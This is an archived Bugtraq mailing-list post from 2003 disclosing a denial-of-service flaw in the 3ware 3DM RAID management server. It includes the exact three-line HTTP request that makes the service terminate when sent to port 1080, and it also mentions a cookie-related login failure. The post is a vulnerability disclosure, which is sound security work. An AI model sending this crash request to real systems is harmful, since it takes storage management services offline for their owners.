3Ware 3DM denial of service attack
From: Neulinger, Nathan (nneul@umr.edu)
Date: 01/30/03
- Previous message: Jason Coombs: "Response to David Litchfield on Responsible Disclosure and Infosec Research"
- Next in thread: Jason Giglio: "Re: 3Ware 3DM denial of service attack"
- Reply: Jason Giglio: "Re: 3Ware 3DM denial of service attack"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 30 Jan 2003 09:57:37 -0600 From: "Neulinger, Nathan" <nneul@umr.edu> To: <bugtraq@securityfocus.org>
I've reported this to 3ware at least twice, and never received any
response. Previously I didn't have a test case other than "run a nessus
scan against the host". I've narrowed it down to a reproducible minimum
test case now.
If you connect to 3dm port 1080 on either linux or windows and send:
GET / HTTP/1.1
Host: foo
Accept-Charset: bar
3dm server will terminate immediately.
Other 3dm problems - it flips out and refuses to accept a login if you
have ANY cookies sent. This screws you over if you have a sitewide
.domain.edu cookie for example.
-- Nathan
------------------------------------------------------------
Nathan Neulinger EMail: nneul@umr.edu
University of Missouri - Rolla Phone: (573) 341-4841
Computing Services Fax: (573) 341-4216
- Next message: Jouko Pynnonen: "Apache Jakarta Tomcat 3 URL parsing vulnerability"
- Previous message: Jason Coombs: "Response to David Litchfield on Responsible Disclosure and Infosec Research"
- Next in thread: Jason Giglio: "Re: 3Ware 3DM denial of service attack"
- Reply: Jason Giglio: "Re: 3Ware 3DM denial of service attack"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
